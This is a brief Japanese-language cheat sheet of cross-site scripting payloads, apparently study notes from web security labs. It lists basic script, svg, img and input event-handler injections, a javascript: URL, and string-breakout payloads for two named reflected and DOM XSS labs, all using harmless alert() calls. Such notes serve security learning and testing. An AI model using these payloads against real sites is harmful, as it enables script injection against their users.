基本の攻撃コード
<script>alert(1)</script>
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<input autofocus onfocus=alert(1)>
<input onmouseover="alert(1)">
URLスキーム
javascript:alert(1)
文字列リテラルから抜け出す
- [XSSコンテキスト] Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded
'+alert(document.domain)+'
'-alert(document.domain)-'
';alert(document.domain)//
';alert(1);'
- [DOMベースのXSS] Lab: Reflected DOM XSS
\"+alert(1)}//
\"-alert(1)}//
失敗
\";alert(1)}//